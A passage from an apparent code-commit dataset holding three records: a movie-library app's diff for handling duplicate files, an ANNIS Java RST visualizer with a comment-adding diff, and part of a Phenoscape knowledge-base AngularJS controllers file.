osLogin() { let t = this; this.app.setState({status: {mode: 1, message: "Contacting OpenSubtitles.org server..."}}); // Login to OSDb OpenSubtitles.api.LogIn("", "", "en", "Movie Monkey v1").then((result) => { 
t.osCheckMovieHash(result['token']); }).catch(console.error); } processFiles(fl) { let t = this; this.fileList = fl.slice(); forEachAsync(fl, function(next, fileName, index, array) { // Calculate Hash and Bytesize of video files t.movies_db.find({fileName: fileName}).exec(function(err, docs) { if(docs.length == 0) { t.app.setState({status: {mode: 1, message: "Processing "+fileName}}); libhash.computeHash( fileName ).then(function(infos){ t.hashList.push(infos['moviehash']); t.bytesizeList.push(infos['moviebytesize']); next(); }); } else { t.fileList.splice(t.fileList.indexOf(fileName), 1); next(); } }); }).then(function(){ // Opensubtitles Login t.osLogin(); }); } }
handle multiple files of same movie
app/core/moviemonkey.js
handle multiple files of same movie
<ide><path>pp/core/moviemonkey.js <ide> tmdb.configuration() <ide> .then((res) => { <ide> tmdb_config = res['images']; <del> }); <add> }).catch(console.error); <ide> } <ide> <ide> insertIntoDB(hash, movie, tmovie, done) { <ide> if(docs.length > 0) { <ide> <ide> // Add the bigger file <add> let movie = docs[0]; <add> let bs = t.bytesizeList[t.hashList.indexOf(hash)]; <add> <add> console.log("Movie already exists, update db", movie.title); <add> console.log(movie.bytesize, bs); <add> <add> if(bs > movie.bytesize) <add> { <add> t.movies_db.update( <add> {imdbid: imdbid}, <add> {$set: <add> { <add> hash: hash, <add> fileName: t.fileList[t.hashList.indexOf(hash)], <add> bytesize: t.bytesizeList[t.hashList.indexOf(hash)] <add> } <add> }, <add> {}, <add> function(e, n) { <add> console.log("updated"); <add> done(); <add> }); <add> } <add> else <add> done(); <ide> <ide> } else { <ide>
Java
apache-2.0
b62166ff389d5b74647f0aeb87e080d4ffec8c88
0
zangsir/ANNIS,amir-zeldes/ANNIS,thomaskrause/ANNIS,thomaskrause/ANNIS,zangsir/ANNIS,pixeldrama/ANNIS,pixeldrama/ANNIS,zangsir/ANNIS,korpling/ANNIS,amir-zeldes/ANNIS,korpling/ANNIS,pixeldrama/ANNIS,zangsir/ANNIS,zangsir/ANNIS,korpling/ANNIS,pixeldrama/ANNIS,pixeldrama/ANNIS,pixeldrama/ANNIS,zangsir/ANNIS,korpling/ANNIS,thomaskrause/ANNIS,thomaskrause/ANNIS,korpling/ANNIS,amir-zeldes/ANNIS,thomaskrause/ANNIS,amir-zeldes/ANNIS,amir-zeldes/ANNIS,amir-zeldes/ANNIS
/* * Copyright 2012 Corpuslinguistic working group Humboldt University Berlin. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package annis.gui.visualizers.component.rst; import annis.gui.visualizers.VisualizerInput; import annis.gui.widgets.JITWrapper; import com.vaadin.ui.Panel; import de.hu_berlin.german.korpling.saltnpepper.salt.graph.Edge; import de.hu_berlin.german.korpling.saltnpepper.salt.graph.GRAPH_TRAVERSE_TYPE; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.resources.dot.Salt2DOT; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.SDataSourceSequence; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.SDocumentGraph; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.SStructure; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.STYPE_NAME; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.STextualDS; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.SToken; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCore.SAnnotation; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCore.SGraphTraverseHandler; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCore.SNode; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCore.SRelation; import java.io.FileOutputStream; import java.util.Stack; import org.eclipse.emf.common.util.BasicEList; import org.eclipse.emf.common.util.EList; import org.eclipse.emf.common.util.URI; import org.json.JSONException; import org.json.JSONObject; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * The Visualizer Plugin for RST-Visualization. * * This class is used for generating for Generating a JSON-object which is * passed to the JITWrapper. * * Particularity: The pointing relations are provided as dominance edges from * salt which are typed as "edge". * * The RST-Data-Model contains sentences in nodes with annotation value segment. * The segments are descends of nodes with annotation value group and the * relations names are span or multiunc. 
* * * @author Benjamin Weißenfels <[email protected]> */ public class RSTImpl extends Panel implements SGraphTraverseHandler { private final JITWrapper jit; private final Logger log = LoggerFactory.getLogger(RSTImpl.class); private Stack<JSONObject> st = new Stack<JSONObject>(); // result of transform operation salt -> json private JSONObject result; final String ANNOTATION_NAME = "cat"; final String ANNOTATION_VALUE = "group"; final String ANNOTATION_NAMESPACE = "default_ns"; private SDocumentGraph graph; private String transformSaltToJSON(VisualizerInput visInput) { graph = visInput.getDocument().getSDocumentGraph(); EList<SNode> nodes = graph.getSRoots(); EList<SNode> rootSNodes = new BasicEList<SNode>(); if (nodes != null) { for (SNode node : nodes) { for (SAnnotation anno : node.getSAnnotations()) { log.debug("anno name {}, anno value {}", anno.getName(), anno.getValue()); if (ANNOTATION_NAME.equals(anno.getName())) { rootSNodes.add(node); log.debug("find root {} with {}", anno, ANNOTATION_NAME); break; } } } } Salt2DOT s2d = new Salt2DOT(); s2d.salt2Dot(graph, URI.createFileURI("/tmp/graph_" + graph.getSName() + ".dot")); if (rootSNodes.size() > 0) { graph.traverse(rootSNodes, GRAPH_TRAVERSE_TYPE.TOP_DOWN_DEPTH_FIRST, "jsonBuild", this); } else { log.debug("does not find an annotation which matched {}", ANNOTATION_NAME); graph.traverse(nodes, GRAPH_TRAVERSE_TYPE.TOP_DOWN_DEPTH_FIRST, "jsonBuild", this); } log.debug("result json string: {}", result); try { String path = "/tmp/" + graph.getSName() + ".js"; FileOutputStream out = new FileOutputStream(path); out.write(result.toString().getBytes("UTF-8")); out.close(); } catch (Exception ex) { log.error("writing json failed", ex); } return result.toString(); } public RSTImpl(VisualizerInput visInput) { jit = new JITWrapper(); this.addComponent(jit); jit.setVisData(transformSaltToJSON(visInput)); jit.requestRepaint(); } private JSONObject createJsonEntry(SNode currNode) { JSONObject jsonData = new JSONObject(); StringBuilder sb = new StringBuilder(); EList<SToken> token = new BasicEList<SToken>(); EList<Edge> edges; if (currNode instanceof SStructure) { edges = currNode.getSGraph().getOutEdges(currNode.getSId()); // get all tokens directly dominated tokens and build a string for (Edge e : edges) { SRelation sedge; if (e instanceof SRelation) { sedge = (SRelation) e; } else { log.error("wrong type of edge for {}", e); continue; } /** * Check if the SRelation points at a SToken and in this case check if, * only follow the edge with sType for avoiding double entries of SToken * in the token list */ if (sedge.getSTarget() instanceof SToken && sedge.getSTypes() != null && sedge.getSTypes().size() > 0) { token.add((SToken) sedge.getSTarget()); } } // build strings for (SToken tok : token) { String text = getText(tok); sb.append(text); log.debug("append: {}", text); } } try { jsonData.put("id", currNode.getSId()); jsonData.put("name", token.size() == 0 ? 
"no token" : sb.toString()); jsonData.put("data", "{}"); } catch (JSONException ex) { log.error("problems create entry for {}", currNode, ex); } return jsonData; } private JSONObject appendChild(JSONObject root, JSONObject node) { try { root.append("children", node); } catch (JSONException ex) { log.error("cannot append {}", node, ex); } return node; } @Override public void nodeReached(GRAPH_TRAVERSE_TYPE traversalType, String traversalId, SNode currNode, SRelation sRelation, SNode fromNode, long order) { st.push(createJsonEntry(currNode)); } @Override public void nodeLeft(GRAPH_TRAVERSE_TYPE traversalType, String traversalId, SNode currNode, SRelation edge, SNode fromNode, long order) { assert st.size() > 0; if (st.size() == 1) { result = st.pop(); } else { JSONObject node = st.pop(); appendChild(st.peek(), node); } } @Override public boolean checkConstraint(GRAPH_TRAVERSE_TYPE traversalType, String traversalId, SRelation incomingEdge, SNode currNode, long order) { EList<String> sTypes; //entry case if (incomingEdge == null) { return true; } // token data structures are not needed if (currNode instanceof SToken) { return false; } /** * check whether the edge has an sType or not, because there are always two * edges in the example rst corpus */ if ((sTypes = incomingEdge.getSTypes()) != null && sTypes.size() > 0) { return true; } else { return false; } } /** * Gets the overlapping token as string from a node, which is direct dominated * by this node. * * @param currNode * @return is null, if there is no relation to a token, or there is more then * one STEXT is overlapped by this node */ private String getText(SToken currNode) { EList<STYPE_NAME> relationTypes = new BasicEList<STYPE_NAME>(); relationTypes.add(STYPE_NAME.STEXT_OVERLAPPING_RELATION); EList<SDataSourceSequence> sSequences = currNode.getSDocumentGraph(). getOverlappedDSSequences(currNode, relationTypes); log.debug("sSequences {}", sSequences.toString()); // only support one text for spanns if (sSequences == null || sSequences.size() != 1) { log.error("rst supports only one text and only text level"); return null; } // check if it is a text data structure if (sSequences.get(0).getSSequentialDS() instanceof STextualDS) { STextualDS text = ((STextualDS) sSequences.get(0).getSSequentialDS()); int start = sSequences.get(0).getSStart(); int end = sSequences.get(0).getSEnd(); return text.getSText().substring(start, end); } // something fundamentally goes wrong log.error("{} instead of {}", sSequences.get(0).getSSequentialDS().getClass().getName(), STextualDS.class.getName()); return null; } }
annis-gui/src/main/java/annis/gui/visualizers/component/rst/RSTImpl.java
/* * Copyright 2012 Corpuslinguistic working group Humboldt University Berlin. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package annis.gui.visualizers.component.rst; import annis.gui.visualizers.VisualizerInput; import annis.gui.widgets.JITWrapper; import com.vaadin.ui.Panel; import de.hu_berlin.german.korpling.saltnpepper.salt.graph.Edge; import de.hu_berlin.german.korpling.saltnpepper.salt.graph.GRAPH_TRAVERSE_TYPE; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.resources.dot.Salt2DOT; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.SDataSourceSequence; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.SDocumentGraph; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.SStructure; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.STYPE_NAME; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.STextualDS; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCommon.sDocumentStructure.SToken; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCore.SAnnotation; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCore.SGraphTraverseHandler; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCore.SNode; import de.hu_berlin.german.korpling.saltnpepper.salt.saltCore.SRelation; import java.io.FileOutputStream; import java.util.Stack; import org.eclipse.emf.common.util.BasicEList; import org.eclipse.emf.common.util.EList; import org.eclipse.emf.common.util.URI; import org.json.JSONException; import org.json.JSONObject; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * * @author Benjamin Weißenfels <[email protected]> */ public class RSTImpl extends Panel implements SGraphTraverseHandler { private final JITWrapper jit; private final Logger log = LoggerFactory.getLogger(RSTImpl.class); private Stack<JSONObject> st = new Stack<JSONObject>(); // result of transform operation salt -> json private JSONObject result; final String ANNOTATION_NAME = "cat"; final String ANNOTATION_VALUE = "group"; final String ANNOTATION_NAMESPACE = "default_ns"; private SDocumentGraph graph; private String transformSaltToJSON(VisualizerInput visInput) { graph = visInput.getDocument().getSDocumentGraph(); EList<SNode> nodes = graph.getSRoots(); EList<SNode> rootSNodes = new BasicEList<SNode>(); if (nodes != null) { for (SNode node : nodes) { for (SAnnotation anno : node.getSAnnotations()) { log.debug("anno name {}, anno value {}", anno.getName(), anno.getValue()); if (ANNOTATION_NAME.equals(anno.getName())) { rootSNodes.add(node); log.debug("find root {} with {}", anno, ANNOTATION_NAME); break; } } } } Salt2DOT s2d = new Salt2DOT(); s2d.salt2Dot(graph, URI.createFileURI("/tmp/graph_" + graph.getSName() + ".dot")); if (rootSNodes.size() > 0) { graph.traverse(rootSNodes, GRAPH_TRAVERSE_TYPE.TOP_DOWN_DEPTH_FIRST, "jsonBuild", this); } else { log.debug("does not find an annotation which matched {}", ANNOTATION_NAME); 
graph.traverse(nodes, GRAPH_TRAVERSE_TYPE.TOP_DOWN_DEPTH_FIRST, "jsonBuild", this); } log.debug("result json string: {}", result); try { String path = "/tmp/" + graph.getSName() + ".js"; FileOutputStream out = new FileOutputStream(path); out.write(result.toString().getBytes("UTF-8")); out.close(); } catch (Exception ex) { log.error("writing json failed", ex); } return result.toString(); } public RSTImpl(VisualizerInput visInput) { jit = new JITWrapper(); this.addComponent(jit); jit.setVisData(transformSaltToJSON(visInput)); jit.requestRepaint(); } private JSONObject createJsonEntry(SNode currNode) { JSONObject jsonData = new JSONObject(); StringBuilder sb = new StringBuilder(); EList<SToken> token = new BasicEList<SToken>(); EList<Edge> edges; if (currNode instanceof SStructure) { edges = currNode.getSGraph().getOutEdges(currNode.getSId()); // get all tokens directly dominated tokens and build a string for (Edge e : edges) { SRelation sedge; if (e instanceof SRelation) { sedge = (SRelation) e; } else { log.error("wrong type of edge for {}", e); continue; } /** * Check if the SRelation points at a SToken and in this case check if, * only follow the edge with sType for avoiding double entries of SToken * in the token list */ if (sedge.getSTarget() instanceof SToken && sedge.getSTypes() != null && sedge.getSTypes().size() > 0) { token.add((SToken) sedge.getSTarget()); } } // build strings for (SToken tok : token) { String text = getText(tok); sb.append(text); log.debug("append: {}", text); } } try { jsonData.put("id", currNode.getSId()); jsonData.put("name", token.size() == 0 ? "no token" : sb.toString()); jsonData.put("data", "{}"); } catch (JSONException ex) { log.error("problems create entry for {}", currNode, ex); } return jsonData; } private JSONObject appendChild(JSONObject root, JSONObject node) { try { root.append("children", node); } catch (JSONException ex) { log.error("cannot append {}", node, ex); } return node; } @Override public void nodeReached(GRAPH_TRAVERSE_TYPE traversalType, String traversalId, SNode currNode, SRelation sRelation, SNode fromNode, long order) { st.push(createJsonEntry(currNode)); } @Override public void nodeLeft(GRAPH_TRAVERSE_TYPE traversalType, String traversalId, SNode currNode, SRelation edge, SNode fromNode, long order) { assert st.size() > 0; if (st.size() == 1) { result = st.pop(); } else { JSONObject node = st.pop(); appendChild(st.peek(), node); } } @Override public boolean checkConstraint(GRAPH_TRAVERSE_TYPE traversalType, String traversalId, SRelation incomingEdge, SNode currNode, long order) { EList<String> sTypes; //entry case if (incomingEdge == null) { return true; } // token data structures are not needed if (currNode instanceof SToken) { return false; } /** * check whether the edge has an sType or not, because there are always two * edges in the example rst corpus */ if ((sTypes = incomingEdge.getSTypes()) != null && sTypes.size() > 0) { return true; } else { return false; } } /** * Gets the overlapping token as string from a node, which is direct dominated * by this node. * * @param currNode * @return is null, if there is no relation to a token, or there is more then * one STEXT is overlapped by this node */ private String getText(SToken currNode) { EList<STYPE_NAME> relationTypes = new BasicEList<STYPE_NAME>(); relationTypes.add(STYPE_NAME.STEXT_OVERLAPPING_RELATION); EList<SDataSourceSequence> sSequences = currNode.getSDocumentGraph(). 
getOverlappedDSSequences(currNode, relationTypes); log.debug("sSequences {}", sSequences.toString()); // only support one text for spanns if (sSequences == null || sSequences.size() != 1) { log.error("rst supports only one text and only text level"); return null; } // check if it is a text data structure if (sSequences.get(0).getSSequentialDS() instanceof STextualDS) { STextualDS text = ((STextualDS) sSequences.get(0).getSSequentialDS()); int start = sSequences.get(0).getSStart(); int end = sSequences.get(0).getSEnd(); return text.getSText().substring(start, end); } // something fundamentally goes wrong log.error("{} instead of {}", sSequences.get(0).getSSequentialDS().getClass().getName(), STextualDS.class.getName()); return null; } }
Wrote comments.
annis-gui/src/main/java/annis/gui/visualizers/component/rst/RSTImpl.java
Wrote comments.
<ide><path>nnis-gui/src/main/java/annis/gui/visualizers/component/rst/RSTImpl.java <ide> import org.slf4j.LoggerFactory; <ide> <ide> /** <add> * The Visualizer Plugin for RST-Visualization. <add> * <add> * This class is used for generating for Generating a JSON-object which is <add> * passed to the JITWrapper. <add> * <add> * Particularity: The pointing relations are provided as dominance edges from <add> * salt which are typed as "edge". <add> * <add> * The RST-Data-Model contains sentences in nodes with annotation value segment. <add> * The segments are descends of nodes with annotation value group and the <add> * relations names are span or multiunc. <add> * <ide> * <ide> * @author Benjamin Weißenfels <[email protected]> <ide> */
JavaScript
mit
f30d30ad4aa7d2291abc514df9cf813c5e4ae840
0
phenoscape/phenoscape-kb-ui,phenoscape/phenoscape-kb-ui
'use strict'; /* Controllers */ angular.module('pkb.controllers', ['ui.bootstrap']) .controller('AppController', function ($scope, $window, $location, AnatomicalTermSearch, OntologyTermSearch, GeneSearch, Vocab) { $scope.$on('$routeChangeSuccess', function() { $window.ga('set', 'page', $location.url()); $window.ga('send', 'pageview'); console.log("route change: " + $location.url()) }); $scope.clickLink = function () { $scope.clearSearch(); }; $scope.clearSearch = function () { $scope.searchText = null; $scope.clearResults(); }; $scope.clearResults = function () { $scope.anatomyResults = null; $scope.taxaResults = null; $scope.geneResults = null; }; $scope.performSearches = function () { if ($scope.searchText) { $scope.anatomyResults = AnatomicalTermSearch.query({text: $scope.searchText, limit: 20}); $scope.taxaResults = OntologyTermSearch.query({text: $scope.searchText, limit: 20, definedBy: Vocab.VTO}); $scope.geneResults = GeneSearch.query({text: $scope.searchText, limit: 20}); } }; }) .controller('HomeController', function ($scope, AnatomicalTermSearch, CharacterStateSearch, OntologyTermSearch, GeneSearch, Vocab) { }) .controller('AboutPhenoscapeKBController', function ($scope, AnnotationSummary) { $scope.annotationSummary = AnnotationSummary.query(); }) .controller('AboutPhenoscapeController', function ($scope) { }) .controller('AnnotateTextController', function ($scope, $sce, $http, ScigraphAnnotator) { $scope.data = { testInput: "", inputText: "The caudal skeleton of the catfishes, order Siluriformes. American Museum novitates ; no. 2398\nLundberg, John G.; Baskin, Jonathan N.\n\nTo achieve a better understanding of the evolution of catfishes, comparative studies of single character complexes throughout the entire order is believed to be a rewarding approach. A survey of the caudal skeleton of the Siluriformes reveals 10 basic features which, taken together, distinguish catfishes from other fishes. Of these the most diagnostic are: 1) bases of hypurals 3 and 4 fused with a distinct U[subscript]2 chordacentrum in the young and with a usually reduced second ural centrum in the adults; 2) a secondary hypurapophysis; 3) principal rays of the caudal fin fewer than 10+9, with upper principal rays equal to, or fewer than, the lower rays. Within the Siluriformes four features of the caudal skeleton are found to exhibit group specific patterns of variation and trends from primitive to advanced conditions, and may thus be useful in determining relationships: 1. In the trend from the primitive condition of six separate hypurals to the most advanced condition of complete fusion of caudal elements, various groups have reached different structural levels. In this process the sixth hypural is lost. 2. The trend toward elaboration of the sites of caudal muscle origin (hypurapophysis and secondary hypurapophysis) has involved the formation and elaboration of shelves from originally distinct projections, and a subsequent dorsal shift of these sites. 3. While the most primitive principal caudal fin ray number in siluriforms is 9+9, most groups have 8+9. The trend toward a reduction of principal rays always involves loss of an upper ray before loss of a lower so that upper principal rays are never more numerous than lower ones. 4. A separate U[subscript]2 chordacentrum is present in the young of all Ostariophysi except the Loricariidae, Plotosidae, and probably the Chacidae. 
In the adults of the majority of catfishes a reduced second ural centrum fused with one or more hypurals lies in the cavity on the posterior face of the compound centrum, PU[subscript]1+ U[subscript]l. In some groups the second ural centrum fuses to the compound centrum. In the Loricariidae and Plotosidae the second ural centrum is fused with PU[subscript]1+U[subscript]l, in early development. A separate, well-developed second ural autocentrum occurs in some members of four specialized and unrelated families. This is interpreted as independent redevelopment of a presumedly primitive pre-ostariophysan condition. The advanced conditions of each of these four features of the caudal skeleton tend to occur together in forms which are also regarded as advanced in most other parts of their anatomy. The primitive character states of these features tend to be retained together in a number of families, i.e. Diplomystidae, Ictaluridae, Bagridae, Cranoglanididae, Schilbeidae, Pangasiidae, and Cetopsidae. Advanced features in the caudal skeleton indicate a relationship between the Clariidae and Heteropneustidae, the Doradidae and Auchenipteridae, the Loricariidae, Astroblepidae, and Callichthyidae, and the Plotosidae and Chacidae. The siluriform caudal skeleton shares many features with that of the cypriniforms but it is consistently more advanced. The ostariophysan caudal skeleton is similar to that of the clupeoids, but it resembles the caudal skeleton of the Gonorynchiformes more closely than that of any other group.", annotatedText: "", longestOnly: false } $scope.tabs = { input: {active: true}, output: {active: false} } $scope.runQuery = function (inputText) { $scope.data.annotatedText = ""; $scope.tabs.output.active = true; $scope.annotationPromise = $http.get('http://kb.phenoscape.org/scigraph/annotations', {params: {content: $scope.data.inputText, longestOnly: $scope.data.longestOnly}}).then(function (response) { var text = response.data; $scope.data.annotatedText = text; } ); }; }) .controller('EntityController', function ($scope, $routeParams, $location, $window, Term, TaxaWithPhenotype, EntityPresence, EntityAbsence, EntityPhenotypeGenes, EntityExpressionGenes, OntologyTermSearch, Vocab, OMN, TaxonPhenotypesQuery, Label, APIroot) { $scope.termID = $routeParams.term; $scope.term = Term.query({'iri': $scope.termID}); $scope.tabs = { properties: {active: true}, taxa: {active: false}, genes: {active: false}, } $scope.taxaTabs = { phenotypes: {active: true}, presence: {active: false}, absence: {active: false} } $scope.genesTabs = { phenotypes: {active: true}, expression: {active: false} } $scope.activateTab = function (tabname) { if (_.has($scope.tabs, tabname)) { $scope.tabs[tabname].active = true; $location.search('tab', tabname); } } $scope.activateTaxaTab = function (tabname) { if (_.has($scope.taxaTabs, tabname)) { $scope.taxaTabs[tabname].active = true; $location.search('taxatab', tabname); } } $scope.activateGenesTab = function (tabname) { if (_.has($scope.genesTabs, tabname)) { $scope.genesTabs[tabname].active = true; $location.search('genestab', tabname); } } // $scope.$on('$routeUpdate', function() { // $scope.activateTab($location.search().tab); // $scope.activateTaxaTab($location.search().taxatab); // $scope.activateGenesTab($location.search().genestab); // }); if ($routeParams.tab && _.has($scope.tabs, $routeParams.tab)) { $scope.tabs[$routeParams.tab].active = true; } if ($routeParams.taxatab && _.has($scope.taxaTabs, $routeParams.taxatab)) { 
$scope.taxaTabs[$routeParams.taxatab].active = true; } if ($routeParams.genestab && _.has($scope.genesTabs, $routeParams.genestab)) { $scope.genesTabs[$routeParams.genestab].active = true; } $scope.autocompleteTaxa = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.VTO }).$promise.then(function (response) { return response.results; }); }; $scope.autocompleteQuality = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.PATO }).$promise.then(function (response) { return response.results; }); }; $scope.filters = { phenotypesTaxonFilter: null, phenotypesQualityFilter: null, phenotypesTaxaIncludeParts: false, phenotypesTaxaIncludeHomologs: false }; if ($routeParams['filters.phenotypesTaxonFilter']) { Label.query({'iri': $routeParams['filters.phenotypesTaxonFilter']}).$promise.then(function (response) { $scope.filters.phenotypesTaxonFilter = response; }); } if ($routeParams['filters.phenotypesQualityFilter']) { Label.query({'iri': $routeParams['filters.phenotypesQualityFilter']}).$promise.then(function (response) { $scope.filters.phenotypesQualityFilter = response; }); } if ($routeParams['filters.phenotypesTaxaIncludeParts']) { $scope.filters.phenotypesTaxaIncludeParts = "true" === $routeParams['filters.phenotypesTaxaIncludeParts']; } if ($routeParams['filters.phenotypesTaxaIncludeHomologs']) { $scope.filters.phenotypesTaxaIncludeHomologs = "true" === $routeParams['filters.phenotypesTaxaIncludeHomologs']; } $scope.taxaWithPhenotypesPage = 1; $scope.taxaWithPhenotypesMaxSize = 3; $scope.taxaWithPhenotypesLimit = 20; $scope.taxaWithPhenotypesPageChanged = function (newPage) { $scope.taxaWithPhenotypesPage = newPage; var params = { entity: OMN.angled($scope.termID), parts: $scope.filters.phenotypesTaxaIncludeParts, homologs: $scope.filters.phenotypesTaxaIncludeHomologs, limit: $scope.taxaWithPhenotypesLimit, offset: ($scope.taxaWithPhenotypesPage - 1) * $scope.taxaWithPhenotypesLimit }; if ($scope.filters.phenotypesTaxonFilter) { params.in_taxon = $scope.filters.phenotypesTaxonFilter['@id']; } if ($scope.filters.phenotypesQualityFilter) { params.quality = OMN.angled($scope.filters.phenotypesQualityFilter['@id']); } $scope.taxaWithPhenotypes = TaxaWithPhenotype.query(params); }; $scope.resetTaxaWithPhenotypes = function() { var params = { entity: OMN.angled($scope.termID), parts: $scope.filters.phenotypesTaxaIncludeParts, homologs: $scope.filters.phenotypesTaxaIncludeHomologs, total: true}; if ($scope.filters.phenotypesTaxonFilter) { params.in_taxon = $scope.filters.phenotypesTaxonFilter['@id']; } if ($scope.filters.phenotypesQualityFilter) { params.quality = OMN.angled($scope.filters.phenotypesQualityFilter['@id']); } $scope.taxaWithPhenotypesTotal = TaxaWithPhenotype.query(params); $scope.taxaWithPhenotypesPageChanged(1); }; $scope.$watchGroup(['filters.phenotypesTaxonFilter', 'filters.phenotypesQualityFilter', 'filters.phenotypesTaxaIncludeParts', 'filters.phenotypesTaxaIncludeHomologs'], function (newValues, oldValues) { updateTaxaWithPhenotypeDownload(); $scope.resetTaxaWithPhenotypes(); }); $scope.$watch('filters.phenotypesTaxonFilter', function (value) { if ($scope.filters.phenotypesTaxonFilter) { $location.search('filters.phenotypesTaxonFilter', $scope.filters.phenotypesTaxonFilter['@id']); } else { $location.search('filters.phenotypesTaxonFilter', null); } }); $scope.$watch('filters.phenotypesQualityFilter', function (value) { if ($scope.filters.phenotypesQualityFilter) { 
$location.search('filters.phenotypesQualityFilter', $scope.filters.phenotypesQualityFilter['@id']); } else { $location.search('filters.phenotypesQualityFilter', null); } }); $scope.$watch('filters.phenotypesTaxaIncludeParts', function (value) { if ($scope.filters.phenotypesTaxaIncludeParts) { $location.search('filters.phenotypesTaxaIncludeParts', $scope.filters.phenotypesTaxaIncludeParts ? "true" : "false"); } else { $location.search('filters.phenotypesTaxaIncludeParts', null); } }); $scope.$watch('filters.phenotypesTaxaIncludeHomologs', function (value) { if ($scope.filters.phenotypesTaxaIncludeHomologs) { $location.search('filters.phenotypesTaxaIncludeHomologs', $scope.filters.phenotypesTaxaIncludeHomologs ? "true" : "false"); } else { $location.search('filters.phenotypesTaxaIncludeHomologs', null); } }); function updateTaxaWithPhenotypeDownload() { var url = APIroot + "/taxon/with_phenotype?"; var urlParams = ["limit=0"]; urlParams.push("entity=" + $window.encodeURIComponent(OMN.angled($scope.termID))); if ($scope.filters.phenotypesQualityFilter) { urlParams.push("quality=" + $window.encodeURIComponent(OMN.angled($scope.filters.phenotypesQualityFilter['@id']))); } if ($scope.filters.phenotypesTaxonFilter) { urlParams.push("in_taxon=" + $window.encodeURIComponent($scope.filters.phenotypesTaxonFilter['@id'])); } if ($scope.filters.phenotypesTaxaIncludeParts) { urlParams.push("parts=" + $scope.filters.phenotypesTaxaIncludeParts) } if ($scope.filters.phenotypesTaxaIncludeHomologs) { urlParams.push("homologs=" + $scope.filters.phenotypesTaxaIncludeHomologs) } $scope.linkToTaxaWithPhenotypeDownload = url + urlParams.join("&"); } $scope.filters.presenceTaxonFilter = null; $scope.taxaWithPresencePage = 1; $scope.taxaWithPresenceMaxSize = 3; $scope.taxaWithPresenceLimit = 20; $scope.taxaWithPresencePageChanged = function (newPage) { $scope.taxaWithPresencePage = newPage; var params = {entity: $scope.termID, limit: $scope.taxaWithPresenceLimit, offset: ($scope.taxaWithPresencePage - 1) * $scope.taxaWithPresenceLimit}; if ($scope.filters.presenceTaxonFilter) { params.in_taxon = $scope.filters.presenceTaxonFilter['@id']; } $scope.taxaWithPresence = EntityPresence.query(params); }; $scope.resetTaxaWithPresence = function() { var params = {entity: $scope.termID, total: true}; if ($scope.filters.presenceTaxonFilter) { params.in_taxon = $scope.filters.presenceTaxonFilter['@id']; } $scope.taxaWithPresenceTotal = EntityPresence.query(params); $scope.taxaWithPresencePageChanged(1); }; $scope.$watch('filters.presenceTaxonFilter', function (value) { $scope.resetTaxaWithPresence(); }); $scope.taxaWithAbsencePage = 1; $scope.taxaWithAbsenceMaxSize = 3; $scope.taxaWithAbsenceLimit = 20; $scope.taxaWithAbsencePageChanged = function (newPage) { $scope.taxaWithAbsencePage = newPage; var params = {entity: $scope.termID, limit: $scope.taxaWithAbsenceLimit, offset: ($scope.taxaWithPresencePage - 1) * $scope.taxaWithAbsenceLimit}; if ($scope.filters.absenceTaxonFilter) { params.in_taxon = $scope.filters.absenceTaxonFilter['@id']; } $scope.taxaWithAbsence = EntityAbsence.query(params); }; $scope.resetTaxaWithAbsence = function() { var params = {entity: $scope.termID, total: true}; if ($scope.filters.absenceTaxonFilter) { params.in_taxon = $scope.filters.absenceTaxonFilter['@id']; } $scope.taxaWithAbsenceTotal = EntityAbsence.query(params); $scope.taxaWithAbsencePageChanged(1); }; $scope.$watch('filters.absenceTaxonFilter', function (value) { $scope.resetTaxaWithAbsence(); }); $scope.phenotypeGenesPage = 1; 
